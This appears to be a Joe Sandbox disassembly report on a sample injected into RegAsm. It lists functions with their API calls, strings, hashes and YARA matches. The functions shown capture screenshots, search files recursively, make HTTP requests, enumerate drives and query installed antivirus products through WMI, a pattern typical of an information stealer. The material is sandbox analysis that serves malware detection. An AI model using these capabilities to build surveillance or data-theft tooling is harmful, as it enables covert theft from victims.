                                                        • API ID: lstrcatlstrcpymemsetwsprintf$FileFind$strtok_s$CloseCreateFirstMatchNextPathSpecSystemTimeUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                        • String ID: %s\%s$%s\%s\%s$%s\*.*
                                                        • API String ID: 4119124785-1853381274
                                                        • Opcode ID: afa40885f8440bfc82478910d7abf250f9b8942455f56687bc9ca887e857d340
                                                        • Instruction ID: 1d63e3fe30f7a02446a4309ce4d67edcec3b63c16b9ad1592f8a33165b0cab2b
                                                        • Opcode Fuzzy Hash: afa40885f8440bfc82478910d7abf250f9b8942455f56687bc9ca887e857d340
                                                        • Instruction Fuzzy Hash: 02B162B290011DABDF20EFA1DC45EEE77BDEF04304F40086AF519E2191EA399A95CB65
                                                        Function 6C0C35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294stringtimeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2954 6c0c35a0-6c0c35be 2955 6c0c38e9-6c0c38fb call 6c0fb320 2954->2955 2956 6c0c35c4-6c0c35ed InitializeCriticalSectionAndSpinCount getenv 2954->2956 2957 6c0c38fc-6c0c390c strcmp 2956->2957 2958 6c0c35f3-6c0c35f5 2956->2958 2957->2958 2960 6c0c3912-6c0c3922 strcmp 2957->2960 2961 6c0c35f8-6c0c3614 QueryPerformanceFrequency 2958->2961 2963 6c0c398a-6c0c398c 2960->2963 2964 6c0c3924-6c0c3932 2960->2964 2965 6c0c374f-6c0c3756 2961->2965 2966 6c0c361a-6c0c361c 2961->2966 2963->2961 2969 6c0c3938 2964->2969 2970 6c0c3622-6c0c364a _strnicmp 2964->2970 2967 6c0c375c-6c0c3768 2965->2967 2968 6c0c396e-6c0c3982 2965->2968 2966->2970 2971 6c0c393d 2966->2971 2972 6c0c376a-6c0c37a1 QueryPerformanceCounter EnterCriticalSection 2967->2972 2968->2963 2969->2965 2973 6c0c3944-6c0c3957 _strnicmp 2970->2973 2974 6c0c3650-6c0c365e 2970->2974 2971->2973 2975 6c0c37b3-6c0c37eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 2972->2975 2976 6c0c37a3-6c0c37b1 2972->2976 2973->2974 2977 6c0c395d-6c0c395f 2973->2977 2974->2977 2978 6c0c3664-6c0c36a9 GetSystemTimeAdjustment 2974->2978 2979 6c0c37fc-6c0c3839 LeaveCriticalSection 2975->2979 2980 6c0c37ed-6c0c37fa 2975->2980 2976->2975 2981 6c0c36af-6c0c3749 call 6c0fc110 2978->2981 2982 6c0c3964 2978->2982 2983 6c0c383b-6c0c3840 2979->2983 2984 6c0c3846-6c0c38ac call 6c0fc110 2979->2984 2980->2979 2981->2965 2982->2968 2983->2972 2983->2984 2989 6c0c38b2-6c0c38ca 2984->2989 2990 6c0c38cc-6c0c38db 2989->2990 2991 6c0c38dd-6c0c38e3 2989->2991 2990->2989 2990->2991 2991->2955
                                                        APIs
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6C14F688,00001000), ref: 6C0C35D5
                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C0C35E0
                                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 6C0C35FD
                                                        • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C0C363F
                                                        • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C0C369F
                                                        • __aulldiv.LIBCMT ref: 6C0C36E4
                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6C0C3773
                                                        • EnterCriticalSection.KERNEL32(6C14F688), ref: 6C0C377E
                                                        • LeaveCriticalSection.KERNEL32(6C14F688), ref: 6C0C37BD
                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6C0C37C4
                                                        • EnterCriticalSection.KERNEL32(6C14F688), ref: 6C0C37CB
                                                        • LeaveCriticalSection.KERNEL32(6C14F688), ref: 6C0C3801
                                                        • __aulldiv.LIBCMT ref: 6C0C3883
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C0C3902
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C0C3918
                                                        • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C0C394C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                        • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                        • API String ID: 301339242-3790311718
                                                        • Opcode ID: acf2d660369a98a9bade5f117d320b60ffc2665daf7f59ca01187a4f292f135e
                                                        • Instruction ID: e6022f04959a744332ad2b738d8e8d288b8ae2084cc3440ee32445e7400e6a7c
                                                        • Opcode Fuzzy Hash: acf2d660369a98a9bade5f117d320b60ffc2665daf7f59ca01187a4f292f135e
                                                        • Instruction Fuzzy Hash: CAB1B3B1B193109BDB08EF28C444B5ABBF5FB8E708F04C92DE999D3790D77099059B82
                                                        Function 0041425C Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 209stringfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • wsprintfA.USER32 ref: 00414277
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 0041428E
                                                        • StrCmpCA.SHLWAPI(?,0041E258), ref: 004142BB
                                                        • StrCmpCA.SHLWAPI(?,0041E254), ref: 004142D5
                                                        • wsprintfA.USER32 ref: 004142F5
                                                        • StrCmpCA.SHLWAPI(?,0041E266), ref: 00414302
                                                        • wsprintfA.USER32 ref: 0041431F
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                          • Part of subcall function 0041296A: _MSFOpenExW.MSPDB140-MSVCRT ref: 00412A12
                                                          • Part of subcall function 0041296A: CreateThread.KERNEL32(00000000,00000000,004118D1,?,00000000,00000000), ref: 00412A27
                                                          • Part of subcall function 0041296A: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00412A2F
                                                        • wsprintfA.USER32 ref: 0041432F
                                                        • PathMatchSpecA.SHLWAPI(?,?), ref: 00414342
                                                        • lstrcatA.KERNEL32(?,?,000003E8), ref: 0041436E
                                                        • lstrcatA.KERNEL32(?,0041E264), ref: 0041437C
                                                        • lstrcatA.KERNEL32(?,?), ref: 0041438C
                                                        • lstrcatA.KERNEL32(?,0041E264), ref: 0041439A
                                                        • lstrcatA.KERNEL32(?,?), ref: 004143AE
                                                        • FindNextFileA.KERNEL32(?,?), ref: 004144FD
                                                        • FindClose.KERNEL32(?), ref: 0041450E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$wsprintf$Find$File$CloseCreateFirstMatchNextObjectOpenPathSingleSpecThreadWaitlstrcpy
                                                        • String ID: %s\%s$%s\*$*.*
                                                        • API String ID: 776177392-3313943580
                                                        • Opcode ID: a5b6472124df2a0867094d2e5c12d3978b7057933662f93c31029e1fb3229121
                                                        • Instruction ID: e3cac18815205b9e675da7c81fe19db4c52384e2885108370299e3dc5aaa035d
                                                        • Opcode Fuzzy Hash: a5b6472124df2a0867094d2e5c12d3978b7057933662f93c31029e1fb3229121
                                                        • Instruction Fuzzy Hash: 36716B7290011DABDF10EBB1DD49DEE77BDBF45304F000866F50AE20A1EA399A59CFA5
                                                        Function 0040FF05 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 150windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memset.MSVCRT ref: 0040FF26
                                                        • GetDesktopWindow.USER32 ref: 0040FF5C
                                                        • GetWindowRect.USER32(00000000,?), ref: 0040FF69
                                                        • GetDC.USER32(00000000), ref: 0040FF70
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 0040FF79
                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0040FF89
                                                        • SelectObject.GDI32(?,00000000), ref: 0040FF96
                                                        • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 0040FFB2
                                                        • GlobalFix.KERNEL32([QAC), ref: 00410010
                                                        • GlobalSize.KERNEL32(?), ref: 0041001B
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                          • Part of subcall function 0040E5C6: lstrcpyA.KERNEL32(00000000,FEE8858D,00414CC5,?,?,00401334,00414CC5,0041E266,00000000,?,00414CC5,?), ref: 0040E5EC
                                                          • Part of subcall function 004046CF: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000030), ref: 0040473D
                                                          • Part of subcall function 004046CF: StrCmpCA.SHLWAPI(?,0041E266,0041E266,0041E266,0041E266), ref: 0040478F
                                                          • Part of subcall function 004046CF: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004047AF
                                                        • SelectObject.GDI32(?,?), ref: 0041007A
                                                        • DeleteObject.GDI32(?), ref: 00410095
                                                        • DeleteObject.GDI32(?), ref: 0041009E
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 004100A6
                                                        • CloseWindow.USER32(00000000), ref: 004100AD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Object$Window$CompatibleCreateDeleteGlobalSelectlstrcpy$BitmapCloseDesktopInternetOpenRectReleaseSizelstrlenmemset
                                                        • String ID: [QAC$[QAC$image/jpeg
                                                        • API String ID: 2262162031-15107070
                                                        • Opcode ID: dd6c1ec02544ace284f2ccd811921dc328e6d6cfdc5fdebfe43da16ca4ec489a
                                                        • Instruction ID: 538f320ac27f42c11279a8f1dda445ded3217d66bc176527513660dacae68afa
                                                        • Opcode Fuzzy Hash: dd6c1ec02544ace284f2ccd811921dc328e6d6cfdc5fdebfe43da16ca4ec489a
                                                        • Instruction Fuzzy Hash: 0A510472801118BFDF01AFE1EC499EE7FBAEF49314B101426F901E2160EB754A55DFA5
                                                        Function 0040503C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 158networkfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040E5C6: lstrcpyA.KERNEL32(00000000,FEE8858D,00414CC5,?,?,00401334,00414CC5,0041E266,00000000,?,00414CC5,?), ref: 0040E5EC
                                                          • Part of subcall function 00403F08: ??_U@YAPAXI@Z.MSVCRT ref: 00403F34
                                                          • Part of subcall function 00403F08: ??_U@YAPAXI@Z.MSVCRT ref: 00403F3D
                                                          • Part of subcall function 00403F08: ??_U@YAPAXI@Z.MSVCRT ref: 00403F46
                                                          • Part of subcall function 00403F08: lstrlenA.KERNEL32(00000000,00000000,?,?,00421C30,ERROR), ref: 00403F60
                                                          • Part of subcall function 00403F08: InternetCrackUrlA.WININET(00000000,00000000,?,00421C30), ref: 00403F70
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040508C
                                                        • StrCmpCA.SHLWAPI(?,?,?,?,?,?,?,00421EE4), ref: 004050A0
                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004050C3
                                                        • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 004050F9
                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0040511D
                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405128
                                                        • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405146
                                                        • InternetReadFile.WININET(00000000,?,000007CF,004117B4), ref: 004051C0
                                                        • InternetCloseHandle.WININET(00000000), ref: 004051CB
                                                        • InternetCloseHandle.WININET(?), ref: 004051D4
                                                        • InternetCloseHandle.WININET(?), ref: 004051DD
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                        • String ID: ERROR$GET
                                                        • API String ID: 3863758870-3591763792
                                                        • Opcode ID: b366115ef4c2e6cb9aec74f446099164c744e6895e863bbd41f109673906db6a
                                                        • Instruction ID: 4aee6e88818fb5bcd11fc69894594e0cca559c2700336c01cb51d474d01497bb
                                                        • Opcode Fuzzy Hash: b366115ef4c2e6cb9aec74f446099164c744e6895e863bbd41f109673906db6a
                                                        • Instruction Fuzzy Hash: 41512A72900119BFEB10ABA1DC85EFF77BDEB04348F10493AF901A6191DB785E058AA5
                                                        Function 00413B50 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 124stringfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • wsprintfA.USER32 ref: 00413B6D
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00413B84
                                                        • StrCmpCA.SHLWAPI(?,0041E258), ref: 00413BA6
                                                        • StrCmpCA.SHLWAPI(?,0041E254), ref: 00413BC0
                                                        • lstrcatA.KERNEL32(?,?,00000104,?,00000104), ref: 00413BF5
                                                        • lstrcatA.KERNEL32(?), ref: 00413C08
                                                        • lstrcatA.KERNEL32(?,?), ref: 00413C1C
                                                        • lstrcatA.KERNEL32(?,?), ref: 00413C2C
                                                        • lstrcatA.KERNEL32(?,0041E264), ref: 00413C3E
                                                        • lstrcatA.KERNEL32(?,?), ref: 00413C52
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                          • Part of subcall function 004069B4: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00421EE4,?,?,0040B0D3,?,?,?,00421EE4), ref: 004069D2
                                                          • Part of subcall function 004069B4: GetFileSizeEx.KERNEL32(00000000,?,?,?,0040B0D3,?,?,?,00421EE4), ref: 004069E9
                                                          • Part of subcall function 004069B4: LocalAlloc.KERNEL32(00000040,?,?,0041E266,?,?,0040B0D3,?,?,?,00421EE4), ref: 00406A05
                                                          • Part of subcall function 004069B4: ReadFile.KERNEL32(?,00000000,?,0040B0D3,00000000,?,0041E266,?,?,0040B0D3,?,?,?,00421EE4), ref: 00406A1F
                                                          • Part of subcall function 004069B4: CloseHandle.KERNEL32(?,?,?,0040B0D3,?,?,?,00421EE4), ref: 00406A40
                                                          • Part of subcall function 0041296A: _MSFOpenExW.MSPDB140-MSVCRT ref: 00412A12
                                                          • Part of subcall function 0041296A: CreateThread.KERNEL32(00000000,00000000,004118D1,?,00000000,00000000), ref: 00412A27
                                                          • Part of subcall function 0041296A: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00412A2F
                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 00413CDB
                                                        • FindClose.KERNEL32(00000000), ref: 00413CEA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectOpenReadSingleSizeThreadWaitlstrcpywsprintf
                                                        • String ID: %s\%s
                                                        • API String ID: 1795740556-4073750446
                                                        • Opcode ID: 69fea7a554c0fbbdf69eee2b228746a2b7427a32eebce116b898d88fb1202515
                                                        • Instruction ID: 27c11b36d7d3208fcd2da61abd022bba150e1303d5377f398811a8659ed3d42d
                                                        • Opcode Fuzzy Hash: 69fea7a554c0fbbdf69eee2b228746a2b7427a32eebce116b898d88fb1202515
                                                        • Instruction Fuzzy Hash: 42411BB290011DABCF10EBB1DD49EDE77BDAF45304F0448B6F605E2051EA3897898FA5
                                                        Function 0040F4A5 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 119comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 0040F4AA
                                                        • CoInitializeEx.OLE32(00000000,00000000,00421690,00421414,00421EE4,?,Work Dir: In memory,00000000,?,00421414,00000000,?,00000000), ref: 0040F4BF
                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040F4D0
                                                        • CoCreateInstance.OLE32(004229F8,00000000,00000001,00422928,?,?,?,?,?,?,?,?,?,?,00414EE3,?), ref: 0040F4EA
                                                        • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0040F520
                                                        • VariantInit.OLEAUT32(?), ref: 0040F56F
                                                          • Part of subcall function 0040F7CD: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,0040F592,?,?,?,?,?,?,?,?,?,?,00414EE3), ref: 0040F7D5
                                                          • Part of subcall function 0040F7CD: CharToOemW.USER32(?,00000000), ref: 0040F7E1
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                        • VariantClear.OLEAUT32(?), ref: 0040F5A0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prologInitInstanceLocalProxySecuritylstrcpy
                                                        • String ID: Select * From AntiVirusProduct$Unknown$WQL$displayName$root\SecurityCenter2$NA
                                                        • API String ID: 3694693100-3248570483
                                                        • Opcode ID: 1e907975ba0bea555f0a1b83e8c9d9c93d65321cf6ed3f47d641348386376b8e
                                                        • Instruction ID: 3d496a20638c3a9500ac2d210f7b53b49cdafc20f0859dfd04a21bc9427bc000
                                                        • Opcode Fuzzy Hash: 1e907975ba0bea555f0a1b83e8c9d9c93d65321cf6ed3f47d641348386376b8e
                                                        • Instruction Fuzzy Hash: 95314C70A01229BBCB10DF92DC49EEFBF78EF49760F20452AF515B6290C7749A41CBA4
                                                        Function 0041391C Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 144stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00413979
                                                        • memset.MSVCRT ref: 00413998
                                                        • GetDriveTypeA.KERNEL32(?), ref: 004139A1
                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 004139C1
                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 004139DF
                                                          • Part of subcall function 00413540: wsprintfA.USER32 ref: 0041355F
                                                          • Part of subcall function 00413540: FindFirstFileA.KERNEL32(?,?), ref: 00413576
                                                          • Part of subcall function 00413540: memset.MSVCRT ref: 0041358F
                                                          • Part of subcall function 00413540: memset.MSVCRT ref: 0041359D
                                                          • Part of subcall function 00413540: StrCmpCA.SHLWAPI(?,0041E258), ref: 004135C0
                                                          • Part of subcall function 00413540: StrCmpCA.SHLWAPI(?,0041E254), ref: 004135DA
                                                          • Part of subcall function 00413540: wsprintfA.USER32 ref: 004135FE
                                                          • Part of subcall function 00413540: StrCmpCA.SHLWAPI(?,0041E266), ref: 0041360F
                                                          • Part of subcall function 00413540: wsprintfA.USER32 ref: 00413635
                                                          • Part of subcall function 00413540: memset.MSVCRT ref: 0041365B
                                                          • Part of subcall function 00413540: lstrcatA.KERNEL32(?,?), ref: 0041366D
                                                          • Part of subcall function 00413540: strtok_s.MSVCRT ref: 0041369E
                                                          • Part of subcall function 00413540: memset.MSVCRT ref: 004136B3
                                                          • Part of subcall function 00413540: lstrcatA.KERNEL32(?,?), ref: 004136C8
                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 00413A02
                                                        • lstrlenA.KERNEL32(?), ref: 00413A64
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
